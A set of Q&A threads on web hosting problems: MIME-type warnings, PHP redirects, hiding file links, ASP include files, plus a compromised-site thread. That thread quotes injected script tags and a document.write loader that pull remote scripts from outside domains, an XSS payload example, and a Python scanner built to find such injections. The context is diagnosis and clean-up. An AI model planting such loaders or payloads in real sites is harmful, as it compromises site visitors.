Having uploaded my JavaScript, PHP and other relevant files to the web hosting server and tried to run them in the browser, I had the following error:
Resource interpreted as Script but transferred with MIME type text/html: "http://stats.hosting24.com/count.php".
It seems that the html and php files work fine but I assume there is a problem with the js files. I would immensely appreciate it if anyone could explain what the actual problem is and how it can be resolved.
Best..
You seem to be using 000webhost, which I know, from experience, inserts a bit of HTML at the end of your HTML that triggers that specific warning in Google Chrome. You'll find this at the end of your page source:
<!-- Hosting24 Analytics Code -->
<script type="text/javascript" src="http://stats.hosting24.com/count.php"></script>
<!-- End Of Analytics Code -->
The page at the URL has an empty response body, which suggests that it is simply a script that records analytics data. No actual JavaScript is returned.
How to Fix the Problem
I was able to fix the problem by disabling that extra bit of HTML. Go to http://members.000webhost.com/analytics.php and fill the form out. The password is the same as the one that you use to connect to your server via FTP. Under "Manage analytics code," choose "Disable Code." Click Submit, and the warning message should go away the next time that you refresh your webpage.
If you don't know the FTP password for your domain, you can change it by logging into your account, clicking "Go to CPanel" under the domain in question, and clicking "Change Account Password" under Main Menu.
Mime type means the type of file that you want your end data to produce. Here is a list of mime types:
http://en.m.wikipedia.org/wiki/Internet_media_type#section_1
The server was saying: "do you want me to process a script? Or do you want me to display this code as html."
It is receiving a script and you want it to display an html. So, the server was confused.
You need to specify the content type in your PHP:
header("Content-type: application/javascript");
In the case of this particular error, the PHP code (I assume) is actually spitting out JavaScript code. By default, Apache will send the contents of any PHP file as HTML, so the web browser receives the script but thinks it should be HTML. The browser is smart enough to "get over" the problem and interpret the script, but if you want to stop the error, make PHP let Apache know that it is returning JavaScript with this:
header("Content-type: text/javascript");
You could use
AddType text/javascript .js
in your .htaccess / httpd.conf
Related
I have recently moved from localhost to my live website. I have a simple PHP login page. After the user's details are checked with my mysql table and if the username exists and they provide a valid password for that username they are redirected to the home page. I was using the header function built in to PHP but this seems to be no longer working now that I am on my live website.
After further research it seems that I cannot use header tags after the page loads. So I am not echo'ing out script tags to window.location redirect to my homepage. The problem with this is that when the new location is being redirected to it appears to look like an additional web page is loading in before my actual webpage that I'm wanting to go to loads in (This is probably due to the fact that I have extra error handling code that is running after the fact). Does anyone else experience this when using this method? Is there a better way to handle this?
This is what I'm using currently just in case there is any confusion
echo '<script>window.location.href = "home.php";</script>';
"I was using the header function built in to PHP but this seems to be no longer working now that I am on my live website."
Headers must be the very first thing that your script outputs or they won't work. PHP has a convenience feature called output buffering which temporarily holds back the output until the script is done. This allows you to put calls to header() anywhere in your code, and then PHP will automatically take care of moving headers to the front of the output for you. Thus, if you have output buffering enabled, you can put headers anywhere and it will still work. If you do not have output buffering enabled, you must put headers at the very start.
I will wager that you are generating output before the headers, and your local PHP install has output buffering enabled, while your remote host does not. You can fix this in one of two ways:
Update your code to ensure that nothing is output before calls to header().
Enable output buffering on your host by setting output_buffering = 1 in your php.ini.
I recently learnt you can do this with a meta tag:
<meta http-equiv="refresh" content="2;url=http://example.com/" />
On my website, all the html and js files are affected by some scripts.
The script below is inside all the html files.
<!--937592--><script type="text/javascript" src="http://jamesdeocariza.com/cnt.php?id=5653691"></script><!--/937592-->
and the below script inside all the js files.
/*ec8243*/
document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>');
/*/ec8243*/
I don't know how this code got inside all the html and js files. This <!--937592--> number and the src="http://jamesdeocariza.com/cnt.php?id=5653691" src url are not static. It's a dynamic number and url.
Is this Cross Side Script (XSS) Attack?
If you are not the owner of the server jamesdeocariza.com and brilleandmore.de then it looked like your server was hacked and someone injected the above code into all of your HTML and JavaScript files.
To explain XSS attacks: Imagine you have a badly written PHP file which contains code like:
<p>Your username <?php echo $_GET["user"] ?></p>
Now someone can write a maliciously formed link to your site like http://example.com/index.php?user=<script>//bad things</script>. If someone clicks on such a link the server would serve an HTML document with
<p>Your username <script>//bad things</script></p>
(In reality the link will be encoded using the URL encoding with %XY.)
In your case it seems worse than just an XSS attack, because it seems that the attacker somehow could change the source code of your site. This may happen in many ways, like hacking your PC or your server (maybe you have a virus on your PC), getting access to your source repository (for example brute forcing the password of your github account), or you had a man in the middle during an unencrypted FTP upload...
Your files are somehow compromised and the next steps you need are:
Remove the above 2 code snippets from your js and HTML files (all) immediately.
Check whether your site has been blacklisted by Google using tools like Sucuri, find out which other files are affected, and remove the unwanted code from those pages.
If Google already blacklisted your website, you will have to request a review AFTER cleaning all the infected files
Search for unwanted dynamic codes which are probably there as a result of this compromising and remove those files.
Find out how the attack may have occurred and fix it (website access logs will come in handy here).
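For the clean-up steps above, a small scanner helps find every affected file. This is an added example, not part of the original answers: it matches the shape of the two wrappers shown in the question rather than fixed ids or URLs, since those change per file. The function names and the sample strings with placeholder hosts are constructed for illustration.

```python
import os
import re

# Marker ids and URLs differ per file, so match the wrapper's shape, not fixed values.
HTML_BLOCK = re.compile(r"<!--(?P<tag>[0-9a-f]{4,})-->(?P<body>.*?)<!--/(?P=tag)-->", re.S | re.I)
JS_BLOCK = re.compile(r"/\*(?P<tag>[0-9a-f]{4,})\*/(?P<body>.*?)/\*/(?P=tag)\*/", re.S | re.I)
SRC = re.compile(r"""src\s*=\s*["'](?P<url>[^"']+)["']""", re.I)


def find_injections(text):
    """Return (marker, script_src, start, end) for every wrapped script block."""
    hits = []
    for pattern in (HTML_BLOCK, JS_BLOCK):
        for m in pattern.finditer(text):
            body = m.group("body")
            if "<script" not in body.lower():
                continue  # matching comment pair without a script tag: ignore
            src = SRC.search(body)
            hits.append((m.group("tag"), src.group("url") if src else None, m.start(), m.end()))
    return sorted(hits, key=lambda h: h[2])


def strip_injections(text):
    """Remove every detected block, working backwards so offsets stay valid."""
    for _, _, start, end in reversed(find_injections(text)):
        text = text[:start] + text[end:]
    return text


def scan_tree(root, exts=(".html", ".htm", ".js", ".php")):
    """Map each affected file under root to the script URLs injected into it."""
    report = {}
    for folder, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(exts):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_injections(fh.read())
                if hits:
                    report[path] = [url for _, url, _, _ in hits]
    return report


# Constructed samples with placeholder hosts, shaped like the two snippets in the question.
SAMPLE_HTML = ('<p>Hello</p><!--123456--><script type="text/javascript" '
               'src="http://injected.example/cnt.php?id=1"></script><!--/123456--></body>')
SAMPLE_JS = ("var a = 1;\n/*ab12cd*/\ndocument.write('<script type=\"text/javascript\" "
             "src=\"http://other.example/cgi-bin/cnt.php?id=2\"></script>');\n/*/ab12cd*/\nvar b = 2;\n")
```

Run scan_tree on a downloaded copy of the site and review the report before rewriting any file with strip_injections.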
I want to hide file links generated by a php function in the source code. I know it's impossible to hide source code but I think there should be a way to hide php generated links in php code.
Here is the part of my code which used to generate links.
<?php foreach($tracks as $track){ ?>
<tr class="track"
data-track_order="<?php echo $track['menu_order']; ?>"
data-track_src="<?php echo $track['audio_file']; ?>">
OUTPUT IN SOURCE
<tr class="track" data-track_order="2" data-track_src="http://domain.com/spins.mp3">
Is there any way in javascript or in php vulnerability to make this hidden in source?
Well, from the above code, I tried so many encryption methods but none of them worked.
I need any solution to make it hidden in source.
There are ways to try to get around this topic BUT the browser NEEDS to see the plain html code in order to render the webpage. Because of this, current methods can be easily circumnavigated and the client will still be able to get hold of the link. So you can never fully stop the client getting your links BUT you can make it harder for them to get at it by using some techniques like javascript obfuscation.
I presume that you want to hide the location so that people can't just retrieve the file without going through your site?
Instead of serving the file directly, have a php file serve the file. This file can then check that you are logged into the system, or have a time limited auth key that was generated from the page, whatever you think may limit the ability to copy and paste the link.
If the client accessing the file doesn't pass the checks, you serve them an authorisation failure header instead of the file contents.
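The time-limited auth key suggested above can be an HMAC over the track id, the visitor's session and an expiry time. The following is an added example, not code from the original answer, written in Python to show the logic; the names SECRET, sign_link and check_link, the query parameter names and the session binding are assumptions. In PHP the same check would use hash_hmac() and hash_equals().

```python
import hashlib
import hmac
import time

# Assumption: a random key stored server-side, outside the web root.
SECRET = b"replace-with-a-random-server-side-key"


def _signature(track_id, session_id, expires):
    msg = f"{track_id}|{session_id}|{expires}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def sign_link(track_id, session_id, ttl=300, now=None):
    """Build the query string the page embeds instead of the real file URL."""
    expires = int(now if now is not None else time.time()) + ttl
    sig = _signature(track_id, session_id, expires)
    return f"track={track_id}&expires={expires}&sig={sig}"


def check_link(track_id, expires, sig, session_id, now=None):
    """Return the HTTP status the serving script should answer with."""
    now = int(now if now is not None else time.time())
    try:
        expires = int(expires)
    except (TypeError, ValueError):
        return 400  # malformed request
    expected = _signature(track_id, session_id, expires)
    # Constant-time comparison so the signature cannot be guessed byte by byte.
    if not hmac.compare_digest(expected.encode(), str(sig).encode()):
        return 403  # forged, altered, or copied into another visitor's session
    if now > expires:
        return 403  # link was valid once but has timed out
    return 200  # caller maps track_id to a file stored outside the web root
```

The page then carries only the track id, expiry and signature, so a copied link stops working once it expires or is used from a different session.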
What is the purpose of hiding the link? To stop people from being able to see the file location, or to stop anything other than your application from accessing the MP3's?
You can program the link into your JavaScript and obfuscate it, which will make it hard for the end user to see the link, but ultimately it's impossible to completely hide it if you are sending the end user to that page.
If you want to simply stop people from accessing the MP3 location(s) you might be better off looking at putting a .htaccess / mod rewrite on the directory that they are residing in, or, have a single .php page to load in the MP3's that will authenticate the referrer and/or server IP address before loading the required file.
New to ASP and probably never named a Javascript file ".inc" :-)
But that seems to be the norm where I'm currently working.
I observed that right on the first page I started getting these javascript errors
Message: 'globalVariableXXX' is undefined
I found that the javascript file wasn't getting called at all.
Just changed the name to ".js" and it worked !!
The ASP file includes the JavaScript file like this :
<SCRIPT LANGUAGE="Javascript" SRC="include/MenuCode.inc"></SCRIPT>
But there are 100's of these ".inc" files and 100's of references to them, hence don't want to go with this solution.
I'd rather understand it..
Any idea why it would've worked in the first place and why it isn't now ?
I'm sure I'm missing something pretty basic in ASP..
Another point : This application is installed on another server and it works just fine there when I hit it. I'm trying to install it on this new box.
Where I made the change for it to work:
In IIS, Right click on the name of the machine and the Mime Types are right over there. Checked the old server and it had the settings for ".inc", copied them and it started working :) Thanks all.
Maybe someone changed the webserver to prevent it serving .inc files ?
In the management console (inetmgr) right click the website and choose Properties. Go to "home directory" tab and click Configuration.
You will probably see the .inc extension there (in the mapping tab) meaning those files are parsed by the ASP engine.
Remove the item from the mappings table, apply and you should be able to parse those files as raw data.
The proper way to use a script tag for javascript is with the type attribute, such as
<script type="text/javascript" src="include/MenuCode.inc"></script>
see: http://www.w3schools.com/tags/tag_script.asp
language isn't even listed as a supported attribute by the standard..
Edit: The reason .js worked and .inc didn't is .js is in the mime type definitions of the server as a JAVASCRIPT mime type by default. If not using an extension configured as text/javascript by default, you have to tell the browser what to treat the file as somehow. This is why the text attribute of script is a required attribute as per html 4.01.
I'm developing a Web Server for android and I've some problems with external javascript files (.js).
With an external css it works fine, because it receives the TCP of the css file and then the server send it as a normal file.
With javascript files it doesn't receive any GET/POST request.
Can I include any tag to tell the browser to get a js file?
At this moment I only tried this one: <script type="text/javascript" src="js/javascript.js"></script>
EDIT:
I just added "text/javascript" content-type but nothing seems to have changed. If I open directly http://ip/js/javascript.js I get the text of javascript.js. Then, if I come back to my index.html, all javascript functions work... why?
EDIT 2:
My server (at this moment) doesn't use threads.. for each request it sends the page and restarts the connection. This may be the problem??
But, in this case "something" should work... no?
EDIT 3:
I had confirmation that it may be a thread problem:
If in the html file I reverse the javascript and the CSS tag, javascript works, css doesn't work. What do you think?
Make sure you aren't caching the file on the client side. If you have the js file linked in the page it will always attempt to download it, with the exception of caching.